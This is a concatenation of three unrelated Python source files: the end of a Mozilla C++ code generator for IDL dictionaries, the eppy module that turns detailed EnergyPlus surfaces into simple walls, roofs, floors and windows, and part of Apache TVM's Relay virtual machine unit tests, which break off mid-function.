hasnullable = True
fd.write("\n %s.SetIsVoid(true);" % attributes[i].name)
if hasnullable:
fd.write("\n")
fd.write("}\n\n")
fd.write("%s::~%s() {}\n\n" % (iface.name, iface.name))
fd.write("static nsresult\n%s_InitInternal(%s& aDict, JSContext* aCx, JSObject* aObj)\n" %
(iface.name, iface.name))
fd.write("{\n")
if iface.base is not None:
fd.write(" nsresult rv = %s_InitInternal(aDict, aCx, aObj);\n" %
iface.base)
fd.write(" NS_ENSURE_SUCCESS(rv, rv);\n")
fd.write(" JSBool found = PR_FALSE;\n")
needjsval = False
needccx = False
for a in attributes:
if not a.realtype.nativeType('in').count("JS::Value"):
needjsval = True
if a.realtype.nativeType('in').count("nsIVariant"):
needccx = True
if needjsval:
fd.write(" jsval v = JSVAL_VOID;\n")
if needccx:
fd.write(" XPCCallContext ccx(NATIVE_CALLER, aCx);\n")
fd.write(" NS_ENSURE_STATE(ccx.IsValid());\n")
for a in attributes:
fd.write(" NS_ENSURE_STATE(JS_HasPropertyById(aCx, aObj, %s, &found));\n"
% get_jsid(a.name))
fd.write(" if (found) {\n")
write_getter(a, iface, fd)
fd.write(" }\n")
fd.write(" return NS_OK;\n")
fd.write("}\n\n")
fd.write("nsresult\n%s::Init(JSContext* aCx, const jsval* aVal)\n" % iface.name)
fd.write("{\n"
" MOZ_ASSERT(NS_IsMainThread());\n"
" if (!aCx || !aVal) {\n"
" return NS_OK;\n"
" }\n"
" if (!aVal->isObject()) {\n"
" return aVal->isNullOrUndefined() ? NS_OK : NS_ERROR_TYPE_ERR;\n"
" }\n\n"
" JSObject* obj = &aVal->toObject();\n"
" nsCxPusher pusher;\n"
" NS_ENSURE_STATE(pusher.Push(aCx, false));\n"
" JSAutoRequest ar(aCx);\n"
" JSAutoCompartment ac(aCx, obj);\n")
fd.write(" return %s_InitInternal(*this, aCx, obj);\n}\n\n" %
iface.name)
if __name__ == '__main__':
from optparse import OptionParser
o = OptionParser(usage="usage: %prog [options] configfile")
o.add_option('-I', action='append', dest='incdirs', default=['.'],
help="Directory to search for imported files")
o.add_option('-o', "--stub-output",
type='string', dest='stub_output', default=None,
help="Quick stub C++ source output file", metavar="FILE")
o.add_option('--header-output', type='string', default=None,
help="Quick stub header output file", metavar="FILE")
o.add_option('--makedepend-output', type='string', default=None,
help="gnumake dependencies output file", metavar="FILE")
o.add_option('--cachedir', dest='cachedir', default=None,
help="Directory in which to cache lex/parse tables.")
(options, filenames) = o.parse_args()
if len(filenames) < 1:
o.error("At least one config filename is needed.")
filename = filenames[0]
if options.cachedir is not None:
if not os.path.isdir(options.cachedir):
os.mkdir(options.cachedir)
sys.path.append(options.cachedir)
# Instantiate the parser.
p = xpidl.IDLParser(outputdir=options.cachedir)
conf = readConfigFile(filename)
if (len(filenames) > 1):
eventconfig = {}
execfile(filenames[1], eventconfig)
simple_events = eventconfig.get('simple_events', [])
for e in simple_events:
eventdict = ("%sInit" % e)
eventidl = ("nsIDOM%s.idl" % e)
conf.dictionaries.append([eventdict, eventidl]);
if options.header_output is not None:
outfd = open(options.header_output, 'w')
print_header_file(outfd, conf)
outfd.close()
if options.stub_output is not None:
make_targets.append(options.stub_output)
outfd = open(options.stub_output, 'w')
print_cpp_file(outfd, conf)
outfd.close()
if options.makedepend_output is not None:
writeMakeDependOutput(options.makedepend_output)
| |
# Copyright (c) 2012 Santosh Philip
# =======================================================================
# Distributed under the MIT License.
# (See accompanying file LICENSE or copy at
# http://opensource.org/licenses/MIT)
# =======================================================================
"""from BUILDINGSURFACE:DETAILED and FENESTRATIONSURFACE:DETAILED make a wall
floor, celiling etc or a window"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
# key fields:
# Name
# Surface Type
# key Floor
# key Wall
# key Ceiling
# key Roof
# Construction Name
# Zone Name
# Outside Boundary Condition
# key Adiabatic
# key Surface
# key Zone
# key Outdoors
# key Ground
# key GroundFCfactorMethod
# key OtherSideCoefficients
# key OtherSideConditionsModel
# key GroundSlabPreprocessorAverage
# key GroundSlabPreprocessorCore
# key GroundSlabPreprocessorPerimeter
# key GroundBasementPreprocessorAverageWall
# key GroundBasementPreprocessorAverageFloor
# key GroundBasementPreprocessorUpperWall
# key GroundBasementPreprocessorLowerWall
# Outside Boundary Condition Object
#
# 'FENESTRATIONSURFACE:DETAILED',
# Surface_Type
# key Window
# key Door
# key GlassDoor
# key TubularDaylightDome
# key TubularDaylightDiffuser
#
#
# 'BUILDINGSURFACE:DETAILED',
# (simple_surface, Surface_Type, Outside_Boundary_Condition)
# ----------------------------------------------------------
# ('WALL:EXTERIOR', Wall, Outdoors)
# ('WALL:ADIABATIC',Wall, Adiabatic)
# ('WALL:UNDERGROUND', Wall, s.startswith('Ground'))
# ('WALL:INTERZONE', Wall, Surface OR Zone)
# ('ROOF', Roof, None or Outdoor)
# ('CEILING:ADIABATIC', Ceiling, Adiabatic)
# ('CEILING:INTERZONE', Ceiling, Surface OR Zone or OtherSideCoefficients)
# ('FLOOR:GROUNDCONTACT', Floor, s.startswith('Ground'))
# ('FLOOR:ADIABATIC', Floor, Adiabatic)
# ('FLOOR:INTERZONE', Floor, Surface OR Zone or OtherSideCoefficients)
#
# 'FENESTRATIONSURFACE:DETAILED',
# (simple_surface, Surface_Type, Outside_Boundary_Condition)
# ----------------------------------------------------------
# ('WINDOW', Window, None)
# ('DOOR', Door, None)
class NotImplementedError(Exception):
"""Exception Object"""
pass
def bsdorigin(bsdobject, setto000=False):
"""return the origin of the surface"""
# not yet implemented
if setto000:
return (0, 0, 0)
else:
raise NotImplementedError
def fsdorigin(fsdobject, setto000=False):
"""return the origin of the surface"""
# not yet implemented
if setto000:
return (0, 0)
else:
raise NotImplementedError
def wallexterior(idf, bsdobject, deletebsd=True, setto000=False):
"""return an wall:exterior object if the (buildingsurface:detailed) is
an exterior wall"""
# ('WALL:EXTERIOR', Wall, Outdoors)
# test if it is an exterior wall
if bsdobject.Surface_Type.upper() == "WALL": # Surface_Type == wall
if (
bsdobject.Outside_Boundary_Condition.upper() == "OUTDOORS"
): # Outside_Boundary_Condition == Outdoor
simpleobject = idf.newidfobject("WALL:EXTERIOR")
simpleobject.Name = bsdobject.Name
simpleobject.Construction_Name = bsdobject.Construction_Name
simpleobject.Zone_Name = bsdobject.Zone_Name
simpleobject.Azimuth_Angle = bsdobject.azimuth
simpleobject.Tilt_Angle = bsdobject.tilt
surforigin = bsdorigin(bsdobject, setto000=setto000)
simpleobject.Starting_X_Coordinate = surforigin[0]
simpleobject.Starting_Y_Coordinate = surforigin[1]
simpleobject.Starting_Z_Coordinate = surforigin[2]
simpleobject.Length = bsdobject.width
simpleobject.Height = bsdobject.height
if deletebsd:
idf.removeidfobject(bsdobject)
return simpleobject
return None
def walladiabatic(idf, bsdobject, deletebsd=True, setto000=False):
"""return a wall:adiabatic if bsdobject (buildingsurface:detailed) is an
adibatic wall"""
# ('WALL:ADIABATIC',Wall, Adiabatic)
# test if it is an adiabatic wall
if bsdobject.Surface_Type.upper() == "WALL": # Surface_Type == wall
if (
bsdobject.Outside_Boundary_Condition.upper() == "ADIABATIC"
): # Outside_Boundary_Condition == Adiabatic
simpleobject = idf.newidfobject("WALL:ADIABATIC")
simpleobject.Name = bsdobject.Name
simpleobject.Construction_Name = bsdobject.Construction_Name
simpleobject.Zone_Name = bsdobject.Zone_Name
simpleobject.Azimuth_Angle = bsdobject.azimuth
simpleobject.Tilt_Angle = bsdobject.tilt
surforigin = bsdorigin(bsdobject, setto000=setto000)
simpleobject.Starting_X_Coordinate = surforigin[0]
simpleobject.Starting_Y_Coordinate = surforigin[1]
simpleobject.Starting_Z_Coordinate = surforigin[2]
simpleobject.Length = bsdobject.width
simpleobject.Height = bsdobject.height
if deletebsd:
idf.removeidfobject(bsdobject)
return simpleobject
return None
def wallunderground(idf, bsdobject, deletebsd=True, setto000=False):
"""return a wall:underground if bsdobject (buildingsurface:detailed) is an
underground wall"""
# ('WALL:UNDERGROUND', Wall, s.startswith('Ground'))
# test if it is an underground wall
if bsdobject.Surface_Type.upper() == "WALL": # Surface_Type == wall
if bsdobject.Outside_Boundary_Condition.upper().startswith(
"GROUND"
): # Outside_Boundary_Condition startswith 'ground'
simpleobject = idf.newidfobject("WALL:UNDERGROUND")
simpleobject.Name = bsdobject.Name
simpleobject.Construction_Name = bsdobject.Construction_Name
simpleobject.Zone_Name = bsdobject.Zone_Name
simpleobject.Azimuth_Angle = bsdobject.azimuth
simpleobject.Tilt_Angle = bsdobject.tilt
surforigin = bsdorigin(bsdobject, setto000=setto000)
simpleobject.Starting_X_Coordinate = surforigin[0]
simpleobject.Starting_Y_Coordinate = surforigin[1]
simpleobject.Starting_Z_Coordinate = surforigin[2]
simpleobject.Length = bsdobject.width
simpleobject.Height = bsdobject.height
if deletebsd:
idf.removeidfobject(bsdobject)
return simpleobject
return None
def wallinterzone(idf, bsdobject, deletebsd=True, setto000=False):
"""return an wall:interzone object if the bsd (buildingsurface:detailed)
is an interaone wall"""
# ('WALL:INTERZONE', Wall, Surface OR Zone OR OtherSideCoefficients)
# test if it is an exterior wall
if bsdobject.Surface_Type.upper() == "WALL": # Surface_Type == wall
if bsdobject.Outside_Boundary_Condition.upper() in (
"SURFACE",
"ZONE",
"OtherSideCoefficients".upper(),
):
simpleobject = idf.newidfobject("WALL:INTERZONE")
simpleobject.Name = bsdobject.Name
simpleobject.Construction_Name = bsdobject.Construction_Name
simpleobject.Zone_Name = bsdobject.Zone_Name
obco = "Outside_Boundary_Condition_Object"
simpleobject[obco] = bsdobject[obco]
simpleobject.Azimuth_Angle = bsdobject.azimuth
simpleobject.Tilt_Angle = bsdobject.tilt
surforigin = bsdorigin(bsdobject, setto000=setto000)
simpleobject.Starting_X_Coordinate = surforigin[0]
simpleobject.Starting_Y_Coordinate = surforigin[1]
simpleobject.Starting_Z_Coordinate = surforigin[2]
simpleobject.Length = bsdobject.width
simpleobject.Height = bsdobject.height
if deletebsd:
idf.removeidfobject(bsdobject)
return simpleobject
return None
def roof(idf, bsdobject, deletebsd=True, setto000=False):
"""return an roof object if the bsd (buildingsurface:detailed) is
a roof"""
# ('ROOF', Roof, None or Outdoor)
# test if it is aroof
if bsdobject.Surface_Type.upper() == "ROOF": # Surface_Type == roof
if bsdobject.Outside_Boundary_Condition.upper() in (
"OUTDOORS",
"",
): # Outside_Boundary_Condition == Outdoor
simpleobject = idf.newidfobject("ROOF")
simpleobject.Name = bsdobject.Name
simpleobject.Construction_Name = bsdobject.Construction_Name
simpleobject.Zone_Name = bsdobject.Zone_Name
simpleobject.Azimuth_Angle = bsdobject.azimuth
simpleobject.Tilt_Angle = bsdobject.tilt
surforigin = bsdorigin(bsdobject, setto000=setto000)
simpleobject.Starting_X_Coordinate = surforigin[0]
simpleobject.Starting_Y_Coordinate = surforigin[1]
simpleobject.Starting_Z_Coordinate = surforigin[2]
simpleobject.Length = bsdobject.width
simpleobject.Width = bsdobject.height
if deletebsd:
idf.removeidfobject(bsdobject)
return simpleobject
return None
def ceilingadiabatic(idf, bsdobject, deletebsd=True, setto000=False):
"""return a ceiling:adiabatic if bsdobject (buildingsurface:detailed) is an
adiabatic ceiling"""
# ('CEILING:ADIABATIC', Ceiling, Adiabatic)
# test if it is an adiabatic ceiling
if bsdobject.Surface_Type.upper() == "CEILING": # Surface_Type == ceiling
if (
bsdobject.Outside_Boundary_Condition.upper() == "ADIABATIC"
): # Outside_Boundary_Condition == Adiabatic
simpleobject = idf.newidfobject("CEILING:ADIABATIC")
simpleobject.Name = bsdobject.Name
simpleobject.Construction_Name = bsdobject.Construction_Name
simpleobject.Zone_Name = bsdobject.Zone_Name
simpleobject.Azimuth_Angle = bsdobject.azimuth
simpleobject.Tilt_Angle = bsdobject.tilt
surforigin = bsdorigin(bsdobject, setto000=setto000)
simpleobject.Starting_X_Coordinate = surforigin[0]
simpleobject.Starting_Y_Coordinate = surforigin[1]
simpleobject.Starting_Z_Coordinate = surforigin[2]
simpleobject.Length = bsdobject.width
simpleobject.Width = bsdobject.height
if deletebsd:
idf.removeidfobject(bsdobject)
return simpleobject
return None
# ('CEILING:INTERZONE', Ceiling, Surface OR Zone)
def ceilinginterzone(idf, bsdobject, deletebsd=True, setto000=False):
"""return an ceiling:interzone object if the bsd (buildingsurface:detailed)
is an interzone ceiling"""
# ('WALL:INTERZONE', Wall, Surface OR Zone OR OtherSideCoefficients)
# test if it is an exterior wall
if bsdobject.Surface_Type.upper() == "CEILING": # Surface_Type == ceiling
if bsdobject.Outside_Boundary_Condition.upper() in (
"SURFACE",
"ZONE",
"OtherSideCoefficients".upper(),
):
simpleobject = idf.newidfobject("CEILING:INTERZONE")
simpleobject.Name = bsdobject.Name
simpleobject.Construction_Name = bsdobject.Construction_Name
simpleobject.Zone_Name = bsdobject.Zone_Name
obco = "Outside_Boundary_Condition_Object"
simpleobject[obco] = bsdobject[obco]
simpleobject.Azimuth_Angle = bsdobject.azimuth
simpleobject.Tilt_Angle = bsdobject.tilt
surforigin = bsdorigin(bsdobject, setto000=setto000)
simpleobject.Starting_X_Coordinate = surforigin[0]
simpleobject.Starting_Y_Coordinate = surforigin[1]
simpleobject.Starting_Z_Coordinate = surforigin[2]
simpleobject.Length = bsdobject.width
simpleobject.Width = bsdobject.height
if deletebsd:
idf.removeidfobject(bsdobject)
return simpleobject
return None
def floorgroundcontact(idf, bsdobject, deletebsd=True, setto000=False):
"""return a wall:adiabatic if bsdobject (buildingsurface:detailed) is an
adibatic wall"""
# ('FLOOR:GROUNDCONTACT', Floor, s.startswith('Ground'))
# test if it is an underground wall
if bsdobject.Surface_Type.upper() == "FLOOR": # Surface_Type == wall
if bsdobject.Outside_Boundary_Condition.upper().startswith(
"GROUND"
): # Outside_Boundary_Condition startswith 'ground'
simpleobject = idf.newidfobject("FLOOR:GROUNDCONTACT")
simpleobject.Name = bsdobject.Name
simpleobject.Construction_Name = bsdobject.Construction_Name
simpleobject.Zone_Name = bsdobject.Zone_Name
simpleobject.Azimuth_Angle = bsdobject.azimuth
simpleobject.Tilt_Angle = bsdobject.tilt
surforigin = bsdorigin(bsdobject, setto000=setto000)
simpleobject.Starting_X_Coordinate = surforigin[0]
simpleobject.Starting_Y_Coordinate = surforigin[1]
simpleobject.Starting_Z_Coordinate = surforigin[2]
simpleobject.Length = bsdobject.width
simpleobject.Width = bsdobject.height
if deletebsd:
idf.removeidfobject(bsdobject)
return simpleobject
return None
def flooradiabatic(idf, bsdobject, deletebsd=True, setto000=False):
"""return a floor:adiabatic if bsdobject (buildingsurface:detailed) is an
adibatic floor"""
# ('FLOOR:ADIABATIC', Floor, Adiabatic)
# test if it is an adiabatic wall
if bsdobject.Surface_Type.upper() == "FLOOR": # Surface_Type == wall
if (
bsdobject.Outside_Boundary_Condition.upper() == "ADIABATIC"
): # Outside_Boundary_Condition == Adiabatic
simpleobject = idf.newidfobject("FLOOR:ADIABATIC")
simpleobject.Name = bsdobject.Name
simpleobject.Construction_Name = bsdobject.Construction_Name
simpleobject.Zone_Name = bsdobject.Zone_Name
simpleobject.Azimuth_Angle = bsdobject.azimuth
simpleobject.Tilt_Angle = bsdobject.tilt
surforigin = bsdorigin(bsdobject, setto000=setto000)
simpleobject.Starting_X_Coordinate = surforigin[0]
simpleobject.Starting_Y_Coordinate = surforigin[1]
simpleobject.Starting_Z_Coordinate = surforigin[2]
simpleobject.Length = bsdobject.width
simpleobject.Width = bsdobject.height
if deletebsd:
idf.removeidfobject(bsdobject)
return simpleobject
return None
def floorinterzone(idf, bsdobject, deletebsd=True, setto000=False):
"""return an floor:interzone object if the bsd (buildingsurface:detailed)
is an interaone floor"""
# ('FLOOR:INTERZONE', Floor, Surface OR Zone OR OtherSideCoefficients)
# test if it is an exterior wall
if bsdobject.Surface_Type.upper() == "FLOOR": # Surface_Type == wall
if bsdobject.Outside_Boundary_Condition.upper() in (
"SURFACE",
"ZONE",
"OtherSideCoefficients".upper(),
):
simpleobject = idf.newidfobject("FLOOR:INTERZONE")
simpleobject.Name = bsdobject.Name
simpleobject.Construction_Name = bsdobject.Construction_Name
simpleobject.Zone_Name = bsdobject.Zone_Name
obco = "Outside_Boundary_Condition_Object"
simpleobject[obco] = bsdobject[obco]
simpleobject.Azimuth_Angle = bsdobject.azimuth
simpleobject.Tilt_Angle = bsdobject.tilt
surforigin = bsdorigin(bsdobject, setto000=setto000)
simpleobject.Starting_X_Coordinate = surforigin[0]
simpleobject.Starting_Y_Coordinate = surforigin[1]
simpleobject.Starting_Z_Coordinate = surforigin[2]
simpleobject.Length = bsdobject.width
simpleobject.Width = bsdobject.height
if deletebsd:
idf.removeidfobject(bsdobject)
return simpleobject
return None
def window(idf, fsdobject, deletebsd=True, setto000=False):
"""return an window object if the fsd (fenestrationsurface:detailed) is
a window"""
# ('WINDOW', Window, None)
if fsdobject.Surface_Type.upper() == "WINDOW": # Surface_Type == w
simpleobject = idf.newidfobject("WINDOW")
simpleobject.Name = fsdobject.Name
simpleobject.Construction_Name = fsdobject.Construction_Name
simpleobject.Building_Surface_Name = fsdobject.Building_Surface_Name
simpleobject.Shading_Control_Name = fsdobject.Shading_Control_Name
simpleobject.Frame_and_Divider_Name = fsdobject.Frame_and_Divider_Name
simpleobject.Multiplier = fsdobject.Multiplier
surforigin = fsdorigin(fsdobject, setto000=setto000)
simpleobject.Starting_X_Coordinate = surforigin[0]
simpleobject.Starting_Z_Coordinate = surforigin[1]
simpleobject.Length = fsdobject.width
simpleobject.Height = fsdobject.height
if deletebsd:
idf.removeidfobject(fsdobject)
return simpleobject
return None
def door(idf, fsdobject, deletebsd=True, setto000=False):
"""return an door object if the fsd (fenestrationsurface:detailed) is
a door"""
# ('DOOR', Door, None)
# test if it is aroof
if fsdobject.Surface_Type.upper() == "DOOR": # Surface_Type == w
simpleobject = idf.newidfobject("DOOR")
simpleobject.Name = fsdobject.Name
simpleobject.Construction_Name = fsdobject.Construction_Name
simpleobject.Building_Surface_Name = fsdobject.Building_Surface_Name
simpleobject.Multiplier = fsdobject.Multiplier
surforigin = fsdorigin(fsdobject, setto000=setto000)
simpleobject.Starting_X_Coordinate = surforigin[0]
simpleobject.Starting_Z_Coordinate = surforigin[1]
simpleobject.Length = fsdobject.width
simpleobject.Height = fsdobject.height
if deletebsd:
idf.removeidfobject(fsdobject)
return simpleobject
return None
def glazeddoor(idf, fsdobject, deletebsd=True, setto000=False):
"""return an glazeddoor object if the fsd (fenestrationsurface:detailed) is
a glassdoor"""
# ('WINDOW', glassdoor, None)
# test if it is glassdoor
if fsdobject.Surface_Type.upper() == "GLASSDOOR":
simpleobject = idf.newidfobject("GLAZEDDOOR")
simpleobject.Name = fsdobject.Name
simpleobject.Construction_Name = fsdobject.Construction_Name
simpleobject.Building_Surface_Name = fsdobject.Building_Surface_Name
simpleobject.Shading_Control_Name = fsdobject.Shading_Control_Name
simpleobject.Frame_and_Divider_Name = fsdobject.Frame_and_Divider_Name
simpleobject.Multiplier = fsdobject.Multiplier
surforigin = fsdorigin(fsdobject, setto000=setto000)
simpleobject.Starting_X_Coordinate = surforigin[0]
simpleobject.Starting_Z_Coordinate = surforigin[1]
simpleobject.Length = fsdobject.width
simpleobject.Height = fsdobject.height
if deletebsd:
idf.removeidfobject(fsdobject)
return simpleobject
return None
def simplesurface(idf, bsd, deletebsd=True, setto000=False):
"""convert a bsd (buildingsurface:detailed) into a simple surface"""
funcs = (
wallexterior,
walladiabatic,
wallunderground,
wallinterzone,
roof,
ceilingadiabatic,
ceilinginterzone,
floorgroundcontact,
flooradiabatic,
floorinterzone,
)
for func in funcs:
surface = func(idf, bsd, deletebsd=deletebsd, setto000=setto000)
if surface:
return surface
return None
def simplefenestration(idf, fsd, deletebsd=True, setto000=False):
"""convert a bsd (fenestrationsurface:detailed) into a simple
fenestrations"""
funcs = (window, door, glazeddoor)
for func in funcs:
fenestration = func(idf, fsd, deletebsd=deletebsd, setto000=setto000)
if fenestration:
return fenestration
return None
| |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import tvm
import numpy as np
from tvm import relay
from tvm.relay.scope_builder import ScopeBuilder
from tvm.relay.testing.config import ctx_list
from tvm.relay.prelude import Prelude
import pytest
def check_result(args, expected_result, mod=None):
"""
Check that evaluating `expr` applied to the arguments produces
`result` on Relay VM.
Parameters
----------
args: list of Expr
The arguments to supply the expr.
expected_result:
The expected result of running the expression.
"""
for target, ctx in ctx_list():
vm = relay.create_executor('vm', ctx=ctx, target=target, mod=mod)
rts_result = vm.evaluate()(*args)
tvm.testing.assert_allclose(expected_result, rts_result.asnumpy())
def veval(f, *args, ctx=tvm.cpu(), target="llvm"):
if isinstance(f, relay.Expr):
mod = relay.Module()
mod["main"] = f
compiler = relay.vm.VMCompiler()
vm = compiler.compile(mod, target)
vm.init(tvm.cpu())
return vm.invoke("main", *args)
else:
assert isinstance(f, relay.Module), "expected expression or module"
mod = f
compiler = relay.vm.VMCompiler()
vm = compiler.compile(mod, target)
vm.init(tvm.cpu())
ret = vm.invoke("main", *args)
return ret
def vmobj_to_list(o):
if isinstance(o, tvm.relay.backend.vmobj.TensorObject):
return [o.asnumpy().tolist()]
elif isinstance(o, tvm.relay.backend.vmobj.DatatypeObject):
result = []
for f in o:
result.extend(vmobj_to_list(f))
return result
else:
raise RuntimeError("Unknown object type: %s" % type(o))
def test_split():
x = relay.var('x', shape=(12,))
y = relay.split(x, 3, axis=0).astuple()
f = relay.Function([x], y)
x_data = np.random.rand(12,).astype('float32')
res = veval(f, x_data)
ref_res = np.split(x_data, 3, axis=0)
for i in range(3):
tvm.testing.assert_allclose(res[i].asnumpy(), ref_res[i])
def test_split_no_fuse():
x = relay.var('x', shape=(12,))
y = relay.split(x, 3, axis=0).astuple()
z = relay.concatenate([relay.TupleGetItem(y, 0)], axis=0)
z = relay.annotation.stop_fusion(z)
f = relay.Function([x], z)
x_data = np.random.rand(12,).astype('float32')
res = veval(f, x_data)
tvm.testing.assert_allclose(res.asnumpy(), np.split(x_data, 3, axis=0)[0])
def test_id():
x = relay.var('x', shape=(10, 10), dtype='float64')
f = relay.Function([x], x)
x_data = np.random.rand(10, 10).astype('float64')
mod = relay.Module()
mod["main"] = f
check_result([x_data], x_data, mod=mod)
def test_op():
x = relay.var('x', shape=(10, 10))
f = relay.Function([x], x + x)
x_data = np.random.rand(10, 10).astype('float32')
mod = relay.Module()
mod["main"] = f
check_result([x_data], 2 * x_data, mod=mod)
def any(x):
x = relay.op.nn.batch_flatten(x)
return relay.op.min(x, axis=[0, 1])
def test_cond():
x = relay.var('x', shape=(10, 10))
y = relay.var('y', shape=(10, 10))
# f = relay.Function([x, y], relay.op.equal(x, y))
f = relay.Function([x, y], any(relay.op.equal(x, y)))
x_data = np.random.rand(10, 10).astype('float32')
y_data = np.random.rand(10, 10).astype('float32')
mod = relay.Module()
mod["main"] = f
# same
check_result([x_data, x_data], True, mod=mod)
# diff
check_result([x_data, y_data], False, mod=mod)
def test_simple_if():
x = relay.var('x', shape=(10, 10))
y = relay.var('y', shape=(10, 10))
f = relay.Function([x, y],
relay.If(any(relay.op.equal(x, y)), x, y))
x_data = np.random.rand(10, 10).astype('float32')
y_data = np.random.rand(10, 10).astype('float32')
mod = relay.Module()
mod["main"] = f
# same
check_result([x_data, x_data], x_data, mod=mod)
# diff
check_result([x_data, y_data], y_data, mod=mod)
def test_simple_call():
mod = relay.module.Module({})
sum_up = relay.GlobalVar('sum_up')
i = relay.var('i', shape=[], dtype='int32')
sb = ScopeBuilder()
sb.ret(i)
func = relay.Function([i], sb.get(), ret_type=relay.TensorType([], 'int32'))
mod[sum_up] = func
i_data = np.array(0, dtype='int32')
iarg = relay.var('iarg', shape=[], dtype='int32')
mod["main"] = relay.Function([iarg], sum_up(iarg))
check_result([i_data], i_data, mod=mod)
def test_count_loop():
mod = relay.module.Module({})
sum_up = relay.GlobalVar('sum_up')
i = relay.var('i', shape=[], dtype='int32')
sb = ScopeBuilder()
with sb.if_scope(relay.equal(i, relay.const(0, dtype='int32'))):
sb.ret(i)
with sb.else_scope():
one_less = relay.subtract(i, relay.const(1, dtype='int32'))
rec_call = relay.Call(sum_up, [one_less])
sb.ret(relay.add(rec_call, i))
func = relay.Function([i], sb.get(), ret_type=relay.TensorType([], 'int32'))
mod[sum_up] = func
i_data = np.array(0, dtype='int32')
iarg = relay.var('i', shape=[], dtype='int32')
mod["main"] = relay.Function([iarg], sum_up(iarg))
result = veval(mod, i_data)
tvm.testing.assert_allclose(result.asnumpy(), i_data)
check_result([i_data], i_data, mod=mod)
def test_sum_loop():
mod = relay.module.Module({})
sum_up = relay.GlobalVar('sum_up')
i = relay.var('i', shape=[], dtype='int32')
accum = relay.var('accum', shape=[], dtype='int32')
sb = ScopeBuilder()
with sb.if_scope(relay.equal(i, relay.const(0, 'int32'))):
sb.ret(accum)
with sb.else_scope():
one_less = relay.subtract(i, relay.const(1, 'int32'))
new_accum = relay.add(accum, i)
sb.ret(relay.Call(sum_up, [one_less, new_accum]))
func = relay.Function([i, accum], sb.get())
mod[sum_up] = func
loop_bound = 0
i_data = np.array(loop_bound, dtype='int32')
accum_data = np.array(0, dtype='int32')
iarg = relay.var('i', shape=[], dtype='int32')
aarg = relay.var('accum', shape=[], dtype='int32')
mod["main"] = relay.Function([iarg, aarg], sum_up(iarg, aarg))
check_result([i_data, accum_data], sum(range(1, loop_bound + 1)), mod=mod)
def test_tuple_fst():
ttype = relay.TupleType([relay.TensorType((1,)), relay.TensorType((10,))])
tup = relay.var('tup', type_annotation=ttype)
f = relay.Function([tup], relay.TupleGetItem(tup, 0))
i_data = np.random.rand(41).astype('float32')
j_data = np.random.rand(10).astype('float32')
mod = relay.Module()
mod["main"] = f
check_result([(i_data, j_data)], i_data, mod=mod)
def test_tuple_second():
ttype = relay.TupleType([relay.TensorType((1,)), relay.TensorType((10,))])
tup = relay.var('tup', type_annotation=ttype)
f = relay.Function([tup], relay.TupleGetItem(tup, 1))
i_data = np.random.rand(41).astype('float32')
j_data = np.random.rand(10).astype('float32')
mod = relay.Module()
mod["main"] = f
check_result([(i_data, j_data)], j_data, mod=mod)
def test_list_constructor():
mod = relay.Module()
p = Prelude(mod)
nil = p.nil
cons = p.cons
l = p.l
one2 = cons(relay.const(1), nil())
one3 = cons(relay.const(2), one2)
one4 = cons(relay.const(3), one3)
f = relay.Function([], one4)
mod["main"] = f
result = veval(mod)
assert len(result) == 2
assert len(result[1]) == 2
obj = vmobj_to_list(result)
tvm.testing.assert_allclose(obj, np.array([3,2,1]))
def test_let_tensor():
sb = relay.ScopeBuilder()
shape = (1,)
x = relay.var('x', shape=shape, dtype='float32')
x1 = relay.var('x1', shape=shape, dtype='float32')
x1 = sb.let(x1, x)
xplusone = x1 + relay.const(42.0, 'float32')
sb.ret(xplusone)
body = sb.get()
f = relay.Function([x], body)
x_data = np.random.rand(*shape).astype('float32')
mod = relay.Module()
mod["main"] = f
check_result([x_data], x_data + 42.0, mod=mod)
def test_let_scalar():
sb = relay.ScopeBuilder()
x = relay.var('x', 'float32')
x1 = sb.let('x1', x)
xplusone = x1 + relay.const(42.0, 'float32')
sb.ret(xplusone)
body = sb.get()
f = relay.Function([x], body)
x_data = np.array(np.random.rand()).astype('float32')
mod = relay.Module()
mod["main"] = f
check_result([x_data], x_data + 42.0, mod=mod)
def test_compose():
mod = relay.Module()
p = Prelude(mod)
compose = p.compose
# add_one = fun x -> x + 1
sb = relay.ScopeBuilder()
x = relay.var('x', 'float32')
x1 = sb.let('x1', x)
xplusone = x1 + relay.const(1.0, 'float32')
sb.ret(xplusone)
body = sb.get()
add_one = relay.GlobalVar("add_one")
add_one_func = relay.Function([x], body)
# add_two = compose(add_one, add_one)
sb = relay.ScopeBuilder()
y = relay.var('y', 'float32')
add_two_func = sb.let('add_two', compose(add_one_func, add_one_func))
add_two_res = add_two_func(y)
sb.ret(add_two_res)
add_two_body = sb.get()
mod[add_one] = add_one_func
f = relay.Function([y], add_two_body)
mod["main"] = f
x_data = np.array(np.random.rand()).astype('float32')
result = veval(mod, [x_data])
tvm.testing.assert_allclose(result.asnumpy(), x_data + 2.0)
def test_list_hd():
mod = relay.Module()
p = Prelude(mod)
nil = p.nil
cons = p.cons
l = p.l
hd = p.hd
one2 = cons(relay.const(1), nil())
one3 = cons(relay.const(2), one2)
one4 = cons(relay.const(3), one3)
three = hd(one4)
f = relay.Function([], three)
mod["main"] = f
result = veval(mod)
tvm.testing.assert_allclose(result.asnumpy(), 3)
@pytest.mark.xfail
def test_list_tl_empty_list():
mod = relay.Module()
p = Prelude(mod)
nil = p.nil
l = p.l
tl = p.tl
f = relay.Function([], tl(nil()))
mod["main"] = f
result = veval(mod)
print(result)
def test_list_tl():
mod = relay.Module()
p = Prelude(mod)
nil = p.nil
cons = p.cons
l = p.l
tl = p.tl
one2 = cons(relay.const(1), nil())
one3 = cons(relay.const(2), one2)
one4 = cons(relay.const(3), one3)
f = relay.Function([], tl(one4))
mod["main"] = f
result = veval(mod)
tvm.testing.assert_allclose(vmobj_to_list(result), np.array([2,1]))
def test_list_nth():
expected = list(range(10))
for i in range(len(expected)):
mod = relay.Module()
p = Prelude(mod)
nil = p.nil
cons = p.cons
nth = p.nth
l = nil()
for i in reversed(expected):
